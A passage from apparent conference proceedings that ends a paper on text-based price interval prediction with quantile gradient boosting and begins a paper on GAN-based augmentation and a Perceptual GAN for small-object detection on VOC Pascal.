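    (84, 59.973129, 94.544094),
    (80, 65.785190, 93.253945),
    (95, 60.164752, 90.126343),
]

# Assumed definitions of the three columns (see the lead-in above).
abs_err_lower = [abs(price - lower) for price, lower, _ in rows]
abs_err_upper = [abs(upper - price) for price, _, upper in rows]
abs_err_interval = [(lo + up) / 2 for lo, up in zip(abs_err_lower, abs_err_upper)]

# Consistency check of the assumed interval definition against the means in Table 6.
table6_mean_check = (18.749340 + 20.576137) / 2

print(mean(abs_err_lower), median(abs_err_lower))
print(mean(abs_err_upper), median(abs_err_upper))
print(mean(abs_err_interval), table6_mean_check)
```

Under these definitions the interval error equals half the interval width whenever the price lies inside the interval, so it grows as the interval is widened, which is exactly the effect the plain coverage percentage does not capture.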
We see that the lower prediction has a smaller median absolute error than the upper prediction. It is interesting to note that the mean and standard deviation of the absolute error are similar for the lower and upper bounds, which shows that the two bounds are almost equally far from the true value.
6.1 Inference
From the tests performed above, we can conclude that the accuracy of the model does not change drastically when the test/train split or the n_estimators value is increased or decreased, because the variance in the data set is very small. To verify this, we added the outliers back into our data set to see whether they introduced additional variance. That did not change anything, and the model returned about 78 percent on the test data. This confirms that the variance in the data set is very small and that the performance changes only slightly with each change.
7 Scope of Future Improvements
Building a model never really ends, as there will always be new requirements, adjustments and improvements that need to be reconciled with the product development process. The main concern is to keep re-training the model as more data is collected over time, because new data brings its own variance and deviation, which a previously trained model could predict incorrectly.
We list the following possible improvements for this model: a) Try various other machine learning algorithms or neural networks, altering the loss function to produce an interval instead of a single estimated value. b) Add location data in the form of GPS coordinates to see how the price changes with location.
8 Conclusion
The main goal of this work was to experiment with different word vectorization methods that can be used with the gradient boosting engine, to take advantage of its inherent quantile regression functionality, and to find out how text data behaves with respect to regression. From all the experiments conducted on this topic, we can conclude that:
• We have successfully shown that numerical intervals can be predicted for arbitrary text data. When a machine learning model predicts a single number, it creates the illusion of a high degree of confidence in the entire modelling process. However, since any model is only a rough approximation, we need to convey the uncertainty in the estimates.
• Even though tree models can be robust, the outcome always depends on the problem we want to solve and the input data for the model. Comparing the TF-IDF, Word2Vec and GloVe methods for converting words to vectors has helped to obtain important text features from the input data.
References
1. Nguyen, D., Smith, N.A., Rose, C.P.: Author age prediction from text using linear regression. In: Proceedings of the 5th ACL-HLT Workshop on Language Technology for Cultural Heritage, Social Sciences, and Humanities (2011)
2. Dereli, N., Saraclar, M.: Convolutional neural networks for financial text regression. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics: Student Research Workshop (2019)
3. Kogan, S., Levin, D., Routledge, B.R., Sagi, J.S., Smith, N.A.: Predicting risk from financial reports with regression. In: Human Language Technologies: The 2009 Annual Conference of the North American Chapter of the ACL (2009)
4. Aggarwal, A., Mittal, M., Battineni, G.: Generative adversarial network: an overview of theory and applications. Elsevier (2020)
5. Li, T., Liu, X., Su, S.: Semi-supervised text regression with conditional generative adversarial networks (2018)
6. Joshi, M., Das, D., Gimpel, K., Smith, N.A.: Movie reviews and revenues: an experiment in text regression. Language Technologies Institute (n.d.)
7. Bitvai, Z., Cohn, T.: Non-linear text regression with a deep convolutional neural network. In: Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Short Papers), pp. 180–185 (2015)
8. Genkin, A., Lewis, D.D., Madigan, D.: Sparse logistic regression for text categorization (n.d.)
9. Chung Wu, H., Fai Wong, K., Kui, L.K.: Interpreting TF-IDF term weights as making relevance decisions. ACM Trans. Inf. Syst. 26, 1–37 (2008)
10. Mikolov, T., Chen, K.C., Dean, J.: Efficient estimation of word representations in vector space (2013)
11. Church, K.W.: Emerging trends Word2Vec. Nat. Lang. Eng. 155–162 (2016)
12. Ma, L., Zhang, Y.: Using Word2Vec to process big text data (2016)
13. Pennington, J., Socher, R., Manning, C.D.: GloVe: global vectors for word representation (n.d.)
14. Ibrahim, M., Gauch, S., Gerth, T., Cox, B.: WOVe: incorporating word order in GloVe word embeddings (n.d.)
15. Shi, T., Liu, Z.: Linking GloVe with word2vec (2014)
16. Chowdhurya, S., Lin, Y., Liaw, B., Kerby, L.: Evaluation of tree based regression over multiple linear regression for non-normally distributed data in battery performance (2021)
17. Dietterich, T.G.: Ensemble methods in machine learning. In: Kittler, J., Roli, F. (eds.) MCS 2000. LNCS, vol. 1857, pp. 1–15. Springer, Heidelberg (2000). https://doi.org/10.1007/3-540-45014-9_1
18. Friedman, J.H.: Greedy function approximation: a gradient boosting machine (2001)
19. Canay, I.A.: A simple approach to quantile regression for panel data. Econ. J. 14, 368–386 (2011)
20. Sáez, D., Ávila, F., Olivares, D., Cañizares, C., Marín, L.: Fuzzy prediction interval models for forecasting renewable resources and loads in microgrids. IEEE Trans. Smart Grid 6, 548–556 (2015)
21. Shrestha, D.L., Solomatine, D.P.: Machine learning approaches for estimation of prediction interval for the model output, 225–235 (2006)
Chosen Methods of Improving Small Object Recognition with Weak Recognizable Features
Magdalena Stachoń1 and Marcin Pietroń2(✉)
1 Institute of Computer Science, AGH University of Science and Technology, Cracow, Poland
2 Institute of Electronics, AGH University of Science and Technology, Cracow, Poland
[email protected]
Abstract. Many object detection models struggle with several problematic aspects of small object detection, including the low number of samples, lack of diversity and low feature representation. GANs belong to the class of generative models, whose objective is to learn to mimic any data distribution. Using a proper GAN model would enable augmenting low-precision data, increasing their amount and diversity. This could potentially improve object detection results. Additionally, incorporating a GAN-based architecture inside a deep learning model can increase the accuracy of small object recognition. In this work, a GAN-based method with augmentation is presented to improve small object detection on the VOC Pascal dataset. The method is compared with popular augmentation strategies such as object rotations and shifts. The experiments are based on the Faster R-CNN model.
Keywords: Deep learning · Object detection · Generative Adversarial Networks · CNN models · VOC Pascal dataset
1 Introduction
Computer vision relies heavily on object detection in domains such as self-driving cars, face recognition, optical character recognition and medical image analysis. Over the past years, great progress has been made with the appearance of deep convolutional neural networks. There are two main families of detectors: the first is based on region proposal methods, such as the R-CNN model family [5]; the other consists of one-stage detectors, which enable real-time object detection with architectures such as YOLO [6] or SSD [7]. These models achieve very impressive results for clear, high-resolution objects; however, the same does not hold for very small objects. Deep learning models create low-level features, which are then combined into higher-level features that the network aims to detect. Due to the significant reduction in image resolution, small object features extracted in the first layers disappear in the following layers and are not taken into account by the detection and classification stages. Their poor-quality appearance makes it impossible to distinguish them from other categories. Accurate detection of small objects is crucial for many disciplines and determines their credibility and effective usage. Detection of small traffic signs and objects affects the safety of self-driving cars. In medical image diagnosis, detecting a tumor of a few pixels in size or recognizing chromosomes enables early treatment [13]. To make full use of satellite image inspection, many small objects need precise annotation. As these examples show, small objects are present in every area of computer vision, and they deserve special attention, as they constitute one of the weakest points of current object detection mechanisms.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 270–285, 2023. https://doi.org/10.1007/978-3-031-28073-3_19
In this work, several approaches were tested and compared to see how they can help improve the detection of small objects. First, the most popular methods based on augmentation techniques were applied. Next, the efficiency of the Perceptual GAN was tested [3]. The Perceptual GAN was trained on data from the unbalanced original dataset and on data generated by DCGAN [9]. These approaches were tested on the VOC Pascal dataset [4] with the Faster R-CNN model [1] using the VGG [11] architecture as a backbone. The VOC Pascal dataset consists mainly of big objects, which widens the accuracy gap for small objects, as the model focuses mainly on medium and big objects. Moreover, there is a significant disproportion in class count depending on object size, which results in a lack of diversity in small objects and their locations. The experiments address three problematic aspects of small object detection: the low number of samples, their lack of diversity, and low feature representation. The first phase involves dataset preparation by augmenting classes for small objects from the VOC Pascal dataset with several oversampling strategies.
The original objects used for oversampling are supplemented by objects generated by a Generative Adversarial Network [14,26,27], based on the original paper [9] and customized for the training purpose. The augmented dataset is fed to the Faster R-CNN model and evaluated on the original ground-truth images. Secondly, for a selected class from the augmented training dataset with low classification results, an FGSM attack is conducted on objects in an attempt to increase the identification score. Finally, to cope with the poor representation of small objects, the enhanced dataset is fed to the Perceptual GAN, which generates super-resolved, large-object-like representations for small objects and makes them easier to recognize.
2 Related Works
Numerous methods have been introduced to address the small object detection problem, with varying results. To close the small object accuracy gap between one-stage and two-stage detectors, Focal Loss [16] can be applied successfully. It modifies the loss function to put more emphasis on misclassified examples: the contribution of correctly learned, easy examples is diminished during training, with the focus placed on difficult ones. With high-resolution photos and relatively small objects, detection accuracy can also be improved by splitting the input image into tiles, with every tile fed separately into the original network. The so-called pyramidal feature hierarchy [17] addresses the problem of scale-invariant object detection. By replacing the standard feature extractor, it allows creating better-quality, high-level multi-scale feature maps. The mechanism involves two inverse pathways. The feature maps computed in the forward pass are upsampled to match the previous layer's dimensions and added element-wise. In this way, the low-level layers are enhanced with the higher-level, semantically stronger features that the network computes close to its head, which makes it easier for the detector to pick up small objects. Evaluation on the MS COCO dataset [15] showed an increase in overall mAP from 47.3 to 56.9. Another approach [18], which addresses a problem subdomain, face detection, tries to make use of object context. The detectors are trained for different scales on features extracted from multiple layers of the feature hierarchy. Context information is also used to improve small object accuracy in [19]. In that work, the authors first extract object context from surrounding pixels by using more abstract features from high-level layers. The features of the object and the context are concatenated, providing an enhanced object representation. The evaluation is performed on SSD with an attention module (A-SSD), which allows the network to focus on important parts rather than the whole image. Compared with conventional SSD, the method achieved a significant improvement for small objects, from 20.7% to 28.5%. Another modification of the Feature Pyramid Network (FPN) approach, applied to Faster R-CNN [20], extracts features from the 3rd, 4th and 5th convolution layers for objects and uses multi-scale features to boost small object detection performance. The features from the higher levels are concatenated with those from the lower levels into a single-dimension vector, and a 1 × 1 convolution is run on the result. This allowed a 0.1 increase in mAP with respect to the original Faster R-CNN model.
The small number of samples is addressed in [21], where the authors use oversampling as a small object dataset augmentation technique and copy-paste the original object several times. In this way, the model is encouraged to focus on small objects and the number of matched anchors increases, which results in a higher contribution of small objects to the loss function. Evaluated on Mask R-CNN using the MS COCO dataset, the small object AP increased while the performance on other object groups was preserved. The best performance gain is achieved with an oversampling ratio of three.
Some generative models [8] attempt to achieve super-resolution representations for small objects, and in this way facilitate their detection. These frameworks can already infer photo-realistic natural images for 4× upscaling factors; however, they are very time-consuming to train. The proposed solution uses a deep residual network (ResNet [12]) to recover downsampled images. The model loss includes an adversarial loss, which pushes the discriminator to distinguish between super-resolution images and original ones, and a content loss to achieve perceptual similarity instead of pixel-space similarity. An SRGAN derivative, classification-oriented SRGAN (CSRGAN) [22], appends a classification branch and introduces a classification loss to the typical SRGAN. The CSRGAN generator is trained to reconstruct realistic super-resolved images with classification-oriented discriminative features from low-resolution images, while the discriminator is trained to predict true categories and distinguish generated SR images from original ones. Another approach [23] proposes data augmentation based on a foreground-background segregation model. It adds an assisting GAN network [2] to the original SSD training process. The first training phase focuses on the foreground-background model and pre-training object detection. The second stage applies, with a certain probability, data enhancement such as color channel change, noise addition and contrast boost. The proposed method increases the overall mAP to 78.7% (the SSD300 baseline is 77.5%). Another super-resolution network, SOD-MTGAN [24], aims to create images in which it is easier for the resulting detector, which is trained alongside the generator, to locate the small objects. The generator is used to upscale blurred images to better quality and create descriptive features for the small objects. The discriminator, apart from differentiating between real and generated images, describes them with a category score and a bounding box location. The Perceptual GAN presented in [3] has the same goal as the previous super-resolution network but a slightly different implementation. Its generator learns to transform poor representations of small objects into super-resolved ones that are similar to real large objects, in order to deceive a competing discriminator. Meanwhile, its discriminator competes with the generator to identify the generated representations and enforces an additional perceptual loss: the generated super-resolution representations of small objects must be useful for the detection task. The small object problem has thus been recognized and some enhancement methods proposed; however, there is still much room for improvement, as the described methods are often domain-specific and apply to certain datasets.
3 Dataset Analysis
Three size groups are extracted from the VOC Pascal dataset according to the annotation bounding boxes: small (size below 32 × 32), medium (size between 32 × 32 and 64 × 64), and big (size above 64 × 64). Corresponding XML annotations are saved for each group, containing only objects of the selected size. Tables 1 and 2 present the object distribution with regard to category and size, which varies significantly. For the trainval dataset, small objects constitute less than 6% of the total object count. Excluding difficult examples, this number drops to 1.3%. Similar statistics apply to the test dataset. These numbers confirm the problem described earlier: there is a significant disproportion in the number of objects across size groups. The categorized VOC Pascal dataset is fed to the pre-trained PyTorch Faster R-CNN model described above, with the accuracy metrics presented in Table 3. Overall, the network's performance on small objects (3.13%) is more than 20 times worse than on big objects (70.38%). Additionally, the number of samples per category differs substantially, which at least partially contributes to the very low accuracy scores. Only 5.9% of the annotated objects in the trainval dataset are small, whereas medium and big objects account for 15.36% and 78.74% respectively. The low number of samples and poor representation of smaller objects is one of the major obstacles in further work, as it prevents the object detection network from learning the right representation. The great disparity between the counts of big and small objects biases Faster R-CNN training towards bigger objects. Moreover, as shown in Table 3, there is a significant disproportion in class numerosity. Based on the publicly available DCGAN model, a customized, stable GAN implementation is introduced in order to increase the variety of small objects and provide a clearer representation. The selected solution augments objects rather than whole images.
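The size grouping described in this section can be sketched as follows. The sketch makes two assumptions that the text does not settle: the size of an object is taken to be the area of its bounding box, compared against 32 × 32 and 64 × 64 pixels, and the annotation follows the usual VOC XML layout with object, name, difficult and bndbox elements. The sample annotation and all function names are hypothetical.

```python
import xml.etree.ElementTree as ET
from collections import Counter

SMALL_AREA = 32 * 32
BIG_AREA = 64 * 64


def size_group(xmin, ymin, xmax, ymax):
    """Assign a bounding box to the small / medium / big group by its area (assumed rule)."""
    area = (xmax - xmin) * (ymax - ymin)
    if area < SMALL_AREA:
        return "small"
    if area <= BIG_AREA:
        return "medium"
    return "big"


def count_by_size(xml_text, include_difficult=True):
    """Count objects per (class name, size group) in one VOC-style annotation."""
    counts = Counter()
    for obj in ET.fromstring(xml_text).iter("object"):
        if not include_difficult and obj.findtext("difficult") == "1":
            continue
        box = obj.find("bndbox")
        coords = [int(box.findtext(tag)) for tag in ("xmin", "ymin", "xmax", "ymax")]
        counts[(obj.findtext("name"), size_group(*coords))] += 1
    return counts


# Hypothetical annotation with one object in each size group.
SAMPLE = """<annotation>
  <object><name>bird</name><difficult>0</difficult>
    <bndbox><xmin>10</xmin><ymin>10</ymin><xmax>30</xmax><ymax>35</ymax></bndbox></object>
  <object><name>car</name><difficult>0</difficult>
    <bndbox><xmin>50</xmin><ymin>60</ymin><xmax>110</xmax><ymax>100</ymax></bndbox></object>
  <object><name>person</name><difficult>1</difficult>
    <bndbox><xmin>0</xmin><ymin>0</ymin><xmax>200</xmax><ymax>300</ymax></bndbox></object>
</annotation>"""

all_counts = count_by_size(SAMPLE)
non_difficult_counts = count_by_size(SAMPLE, include_difficult=False)
print(all_counts)
print(non_difficult_counts)
```

Summing such counters over all annotation files would give per-class statistics of the kind reported in Tables 1 and 2, with and without objects marked as difficult.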
4 Data Augmentation with DCGAN
One of the augmentation techniques used in the experiments was small object generation with DCGAN (deep convolutional GAN) [28]. The model's discriminator is made up of convolution layers, batch norm layers and leaky ReLU activations. Its input is a 3 × 32 × 32 image and its output is a scalar probability that the input comes from the real data distribution. The generator consists of a series of transposed convolution layers, batch norm layers and ReLU activations. Its input is a 100-dimensional latent vector z drawn from a standard Gaussian distribution, and its output is a 3 × 32 × 32 RGB image. The model weights are initialized randomly from a normal distribution with mean 0 and standard deviation 0.02. Both models use Adam optimizers with learning rate 0.0002 and beta = 0.5. The batch size is 64. In addition, some adjustments are introduced to improve the network's stability and performance. First, the training is split into two parts, one for the generator and one for the discriminator, and separate batches are constructed for real and fake objects. Secondly, to balance the training progress of the generator and the discriminator, soft and noisy data labels are introduced: instead of labelling real and fake data as 1 and 0, a random number from the range 0.8–1.0 or 0.0–0.2, respectively, is chosen. Moreover, the generator uses dropout (25%) after each layer. The generator's progress is assessed manually, by generating a fixed batch of latent vectors drawn from a Gaussian distribution and periodically feeding it to the generator. The evaluation covers both the quality and the diversity of the images in relation to the target domain. Typical training lasts 1000–2000 epochs, depending on the size of the dataset. Fig. 1 presents generated samples for the bird class.
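The soft and noisy labels described above can be sketched in a few lines. The text only states the two ranges, so drawing the values uniformly is an assumption of this sketch, and the function name and the fixed seed are hypothetical.

```python
import random


def soft_labels(batch_size, real, rng):
    """Draw noisy discriminator targets: [0.8, 1.0] for real data, [0.0, 0.2] for fake data."""
    low, high = (0.8, 1.0) if real else (0.0, 0.2)
    # Assumption: values are sampled uniformly within the stated range.
    return [rng.uniform(low, high) for _ in range(batch_size)]


rng = random.Random(0)  # fixed seed so the example is reproducible
real_targets = soft_labels(64, real=True, rng=rng)   # one target per real object in the batch
fake_targets = soft_labels(64, real=False, rng=rng)  # one target per generated object

print(min(real_targets), max(real_targets))
print(min(fake_targets), max(fake_targets))
```

These targets would replace the hard labels 1 and 0 when the discriminator loss is computed for the real batch and the fake batch, respectively.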
Chosen Methods of Improving Small Object Recognition
Table 1. Object number statistics for classes from VOC Pascal (airplane, bike, bird, boat, bottle, bus, car, cat, chair, cow) for trainval and test set with the division for small, medium, big categories

Type                       Airplane  Bike  Bird  Boat  Bottle  Bus   Car  Cat  Chair  Cow
Test small                       25    12    57    65      40    6   149    1     58   28
Test small (non diff)            23     0    12     4       1    1    33    1      0    3
Trainval small                   19    15    36    25      62   12   173    0     34   21
Trainval small (non diff)        15     1     8     1      10    1    35    0      2    1
Test medium                      35    31   116    87     186   18   339    6    250   96
Trainval medium                  39    36   119    90     168   18   398    9    258   56
Test big                        251   346   403   241     431  230  1053  363   1066  205
Trainval big                    273   367   444   283     404  242  1073  380   1140  279
Table 2. Object number statistics for classes from VOC Pascal (table, dog, horse, motorbike, person, potted plant, sheep, sofa, train, tv monitor) for trainval and test set with the division for small, medium, big categories

Type                       Table  Dog  Horse  Moto  Person  Plant  Sheep  Sofa  Train   Tv
Test small                     1    4      4     9     305     35     47     0      0   15
Test small (non diff)          0    0      1     1      99     15     14     0      0    7
Trainval small                 0    0      3    11     370     41     87     0      1   14
Trainval small (non diff)      0    0      1     1      89     20     22     0      0    2
Test medium                    8   18     34    36     811    123     57     0     11   64
Trainval medium               11   18     15    30     819    159     79     6     13   65
Test big                     290  508    357   324    4111    434    207   396    291  282
Trainval big                 299  520    388   349    4258    425    187   419    314  288
Fig. 1. DCGAN generated samples of a bird (left), original training dataset for the bird category (right)
M. Stachoń and M. Pietroń
Table 3. Mean average precision in percent on VOC Pascal small, medium and big objects for the pre-trained Faster R-CNN model. Below, the number of samples per size category for trainval and test images (both include objects marked as difficult). As one image may contain objects from multiple size groups, its ID may appear in several size categories. This is why the numbers of small, medium and big object images do not add up to the total number of images.

Dataset                        All objects  Small objects  Medium objects  Big objects
mAP                                  69.98           3.13           12.62        70.38
Number of images (test)              4 952            366             995        4 843
Number of objects (test)            14 976            861           2 326       11 789
Number of images (trainval)          5 011            378             486        4 624
Number of objects (trainval)        15 662            924           2 406       12 332
GAN training requires a considerable amount of low-dimensional data with a clear representation, which determines the quality of the generated objects. The main object detection dataset evaluated in the presented work is VOC Pascal; however, it is a relatively small dataset, even when all size groups of a given object are included in training. To make DCGAN training more efficient, the dataset has to be extended with other images. Samples from the following datasets were tried for training: Stanford-cars [25], CINIC-10, FGVC-aircraft, MS COCO, CIFAR-100 [10], 102 Category Flower Dataset, ImageNet and Caltech-UCSD. Seven categories were taken as a case study: car, airplane, tv monitor, boat, potted plant, bird and horse. Table 4 presents the datasets that were successfully applied for object generation, with the corresponding sample counts. To fulfill the input requirements, the data had to be preprocessed to obtain 32 × 32 RGB images. Despite its numerosity, training on the ImageNet dataset does not bring positive results: the representation of many images is not clear enough, multiple objects are present in single-category images, and downsampling high-resolution images produces noise. Similar results are obtained for the MS COCO dataset, in which the majority of objects are rectangular: after downsampling to a square 32 × 32 resolution, the preprocessed images are noisy. In conclusion, a successful dataset for a deep GAN should consist of at least several thousand low-resolution samples with a clear representation for each generated class.
5 Augmentation Setup
5.1 Oversampling Strategies
The training dataset for learning FasterRCNN is augmented with several oversampling techniques. As a common rule, the objects are copied from the original location and pasted to a different position, which does not overlap with
Table 4. Datasets used for DCGAN training with the cumulative number of samples per each used category

Category      Datasets                                                                   Count
Car           Stanford-cars, CINIC-10, VOC Pascal                                       22 928
Airplane      FGVC-aircraft, CINIC-10, MS COCO, VOC Pascal                              19 358
Tv monitor    MS COCO, VOC Pascal                                                       10 175
Boat          MS COCO, CINIC-10, VOC Pascal                                             28 793
Potted plant  CIFAR-100, ImageNet, MS COCO, 102 Category Flower Dataset, VOC Pascal     17 772
Bird          Caltech-UCSD, CINIC-10, VOC Pascal                                        12 363
Horse         CINIC-10, MS COCO, VOC Pascal                                             33 012
other objects and the image boundaries. The oversampling ratio equals three. This simple method enlarges the area covered by small objects and puts more emphasis on the small object loss during the training stage. The experiments are summarized in Table 5. Two sets of experiments are conducted. In the first one, VOC Pascal objects are used for oversampling in three different scenarios. First, the original small object is picked in each image and copy-pasted three times at random locations, keeping the original object size (strategy 1). Second, instead of multiplying the original object, a random VOC Pascal object of the matching category is picked, with replacement, for every copy-paste action. Each oversampled object is rescaled to a random width and height taken from the range between the current width and height and 32 pixels (strategy 2). Oversampling increases the object count; however, since the original number of small object samples is around 30 times lower than that of the bigger ones, this oversampling strategy would increase the dataset size only by a factor of 3, still leaving a considerable count disproportion. To address this problem, every image containing a small object is used 5 times with the described random oversampling strategy, which results in multiple copies of the original images oversampled with different objects of a given category (strategy 3). The third strategy additionally involves object class modification. The previous method is extended with the following assumption: for every picked small object, a random VOC Pascal category is chosen from the set of the most numerous small test categories. This excludes the following classes: sofa, dog, table, and cat, for which the number of both train and test samples is below five. The second set of experiments makes use of DCGAN generated objects.
Generated objects are substituted for the following categories: airplane, bird, boat, car, chair, horse, person, potted plant, and tv monitor. There are two test settings, similar to the ones conducted for the augmentation with original VOC Pascal objects. In the first setting, for every original small object, a random object of the same category is picked. For the classes available from DCGAN, generated objects are used; for the others (bike, bottle, bus, cow, motorbike, sheep), the samples come from VOC Pascal. Similarly to the first experiment set, every image containing a small object is used
for oversampling five times with an oversampling ratio of three. The second setting preserves the conditions of the first one and additionally switches the class of every object, while increasing the number of oversampling repetitions. For less numerous classes with a trainval count below 15 (airplane, train, bicycle, horse, motorbike, bus), the oversampling procedure is repeated 15 times; for the other categories, 10 times. Detailed information about the augmented dataset numerosity for each oversampling strategy is presented in Table 6. It is clear that some of the introduced datasets (strategies 1, 2 and 4) present a significant disparity in the number of samples for different categories, as they do not include the class change. In strategy 2, the person class is more than 100 times as numerous as the train category. To compensate for this disparity, the random class modification is introduced in strategies 3 and 5, which results in a more evenly distributed dataset. For every experiment, VOC Pascal image annotation files are created with the corresponding objects, while the original annotations are erased in order to avoid duplicates. The five resulting augmented datasets are introduced to the Faster R-CNN network separately; for each of them, the training is combined with the original trainval VOC Pascal dataset. The results are evaluated on the original ground-truth dataset, divided into three size categories (small, medium and big).

Table 5. Augmentation strategies overview

Strategy 1  Oversample x3 original VOC Pascal object with random size and random location
Strategy 2  Oversample x3 random VOC Pascal object of the same category with random size and location; the procedure is repeated 5 times for every small object
Strategy 3  Oversample x3 random VOC Pascal object of the randomly changed category with random size and location; the procedure is repeated 5 times for every small object
Strategy 4  Oversample x3; for selected classes DCGAN generated objects are used, for others random VOC Pascal objects with random size and location; the object category is preserved; the procedure is repeated 5 times for every small object
Strategy 5  Oversample x3; for selected classes DCGAN generated objects are used, for others random VOC Pascal objects with random size and location; the object category is randomly chosen; the procedure is repeated 15 times for less numerous categories (aeroplane, train, bicycle, horse, motorbike, bus), 10 times for the others
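The common copy-paste rule shared by all five strategies (paste each copy at a random position that stays inside the image and does not overlap other objects) can be illustrated with the minimal Python sketch below. Boxes are assumed to be (x1, y1, x2, y2) pixel tuples; the function names, the rejection-sampling loop, the `max_tries` limit and the example image size are hypothetical choices made for illustration, not details taken from the experiments.

```python
import random


def overlaps(a, b):
    """True if two (x1, y1, x2, y2) boxes share any area."""
    return a[0] < b[2] and b[0] < a[2] and a[1] < b[3] and b[1] < a[3]


def paste_positions(obj_w, obj_h, img_w, img_h, occupied, copies=3, max_tries=100, rng=random):
    """Sample up to `copies` boxes that lie inside the image and avoid all other boxes."""
    placed = []
    for _ in range(copies):
        for _ in range(max_tries):
            # Top-left corner chosen so that the whole object stays inside the image.
            x1 = rng.randint(0, img_w - obj_w)
            y1 = rng.randint(0, img_h - obj_h)
            box = (x1, y1, x1 + obj_w, y1 + obj_h)
            # Reject positions that touch annotated objects or earlier copies.
            if not any(overlaps(box, other) for other in list(occupied) + placed):
                placed.append(box)
                break
    return placed


rng = random.Random(0)  # fixed seed for reproducibility only
existing = [(50, 60, 200, 220), (300, 100, 330, 130)]  # hypothetical annotated objects
new_boxes = paste_positions(24, 20, 500, 375, existing, copies=3, rng=rng)
```

Each returned box would then be written to the image's annotation file together with the class of the pasted object; with an oversampling ratio of three, one small object yields three additional annotations.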
5.2 Perceptual GAN
Once a dataset with an even size distribution has been prepared and the generated objects have been confirmed to be correctly recognized by the network, the data are introduced to the Perceptual GAN (PCGAN), which addresses the next cause of poor small object detection: their weak feature representation. The PCGAN aims to generate super-resolved
Table 6. Augmented dataset count summary, distributed per classes and augmentation strategies. Strategies 1, 2 and 4, as they do not include the class change, present a significant disparity in the number of samples for different categories. In strategy 2, person class numerosity is more than 100 times of the count for train category. To cover this imparity, the random class modification is introduced in strategies 3 and 5, which results in more even class distribution.

Class      Strategy 1  Strategy 2  Strategy 3  Strategy 4  Strategy 5
All             3 696       6 810       6 810       6 810      12 624
Airplane           76         187         381         187         790
Bike               60          48         296          48         703
Bird              144         216         406         216         783
Boat              100         235         413         235         762
Bottle            248         422         414         422         829
Bus                48         120         426         120         763
Car               692       1 448         540       1 448         858
Chair             136         319         416         319         745
Cow                84         186         367         186         729
Horse              12          51         334          51         742
Motorbike          44         116         366         116         699
Person          1 480       2 680         722       2 680       1 098
Plant             164         251         412         251         728
Sheep             348         342         457         342         882
Train               4          25         381          25         712
Tv                 56         164         379         164         801
large-object-like representations for small objects. The approach is similar to the architecture described in [3]. The generator is a modified Faster R-CNN network with a residual branch, which accepts the features from a lower-level convolutional layer (the first conv layer) and passes them to 3 × 3 and 1 × 1 convolutions, followed by a max pool layer. Next come two residual blocks, each consisting of two 3 × 3 convolutions and batch normalizations with ReLU activations, which aim to learn the residual representation of small objects. The super-resolved representation is acquired by the element-wise sum of the learned residual representation and the features pooled from the fifth conv layer in the main branch. The learning objective for vanilla GAN models [27] corresponds to a minimax two-player game, which is formulated as (Eq. 1):

$$\min_G \max_D L(D, G) = \mathbb{E}_{x \sim p_{data}(x)}[\log D(x)] + \mathbb{E}_{z \sim p_z(z)}[\log(1 - D(G(z)))] \tag{1}$$
$G$ represents a generator that learns to map data $z$ (with the noise distribution $p_z(z)$) to the distribution $p_{data}(x)$ over data $x$. $D$ represents a discriminator that estimates the probability of a sample coming from the data distribution $p_{data}(x)$ rather than $p_z(z)$. The training procedure for $G$ is to maximize the probability of $D$ making a mistake.
Here $x$ and $z$ are the representations of large objects and small objects, i.e., $F_l$ and $F_s$ respectively. The goal is to learn a generator function that transforms the representation of a small object $F_s$ into a super-resolved one $G(F_s)$ that is similar to the original representation of a large object $F_l$. Therefore, a new conditional generator model is introduced, which is conditioned on extra auxiliary information, i.e., the low-level features $f$ of the small object, from which the generator learns to generate the residual between the representations of large and small objects through residual learning (Eq. 2).

$$\min_G \max_D L(D, G) = \mathbb{E}_{F_l \sim p_{data}(F_l)}[\log D(F_l)] + \mathbb{E}_{F_s \sim p_{F_s}}[\log(1 - D(F_s + G(F_s \mid f)))] \tag{2}$$

In this case, generator training is substantially simpler than directly learning the super-resolved representations for small objects. For example, if the input representation comes from a large object, the generator only needs to learn a zero mapping. The discriminator in the original paper [3] consists of two branches: an adversarial branch, which distinguishes the generated super-resolved representation from the original one of a large object, and a perception branch, which validates the influence of the generated super-resolved features on accuracy. In this solution, the perception branch is omitted and the main emphasis is put on the adversarial branch. The adversarial branch consists of three fully connected layers, followed by a sigmoid activation producing the adversarial loss. For training purposes, two datasets are prepared, containing images with only small and only big objects respectively. The images are resized to 1000 × 600 pixels. To solve the adversarial min-max problem, the parameters of the generator and discriminator networks are optimized. Denote by $G_{\Theta_g}$ the generator network with parameters $\Theta_g$. $\Theta_g$ is obtained by optimizing the loss function $L_{dis}$ ($L_{dis}$ is the adversarial loss, Eq. 3).

$$\Theta_g = \arg\min_{\Theta_g} L_{dis}(G_{\Theta_g}(F_s)) \tag{3}$$

Suppose $D_{\Theta_a}$ is the adversarial branch of the discriminator network, parameterized by $\Theta_a$. $\Theta_a$ is obtained by optimizing a specific loss function $L_a$ (Eq. 4).

$$\Theta_a = \arg\min_{\Theta_a} L_a(G_{\Theta_g}(F_s), F_l) \tag{4}$$

The loss $L_a$ is defined as:

$$L_a = -\left[\log D_{\Theta_a}(F_l) + \log\left(1 - D_{\Theta_a}(F_s + G_{\Theta_g}(F_s))\right)\right] \tag{5}$$
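As a numerical illustration of Eq. 5, the sketch below evaluates the adversarial loss on a batch of discriminator outputs. It assumes that Eq. 5 is read as the usual binary cross-entropy form, i.e. the negative of the objective that D maximizes in Eq. 2, and that the loss is averaged over the batch; the function name, the `eps` guard and the example probabilities are illustrative assumptions.

```python
import math


def adversarial_loss(d_large, d_small_sr, eps=1e-12):
    """Batch mean of -[log D(F_l) + log(1 - D(F_s + G(F_s)))].

    d_large    -- discriminator outputs for real large-object features
    d_small_sr -- discriminator outputs for super-resolved small-object features
    eps        -- small constant guarding against log(0) (an added safeguard)
    """
    if len(d_large) != len(d_small_sr):
        raise ValueError("both batches must have the same length")
    total = 0.0
    for p_real, p_fake in zip(d_large, d_small_sr):
        total -= math.log(p_real + eps) + math.log(1.0 - p_fake + eps)
    return total / len(d_large)


# A discriminator that separates the two groups well gets a low loss,
# while an undecided one (all outputs 0.5) gets 2 * ln(2) per sample.
confident = adversarial_loss([0.9, 0.95], [0.1, 0.05])
undecided = adversarial_loss([0.5, 0.5], [0.5, 0.5])
```

Minimizing this quantity with respect to the discriminator parameters corresponds to Eq. 4, while the generator is trained to push the second term in the opposite direction.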
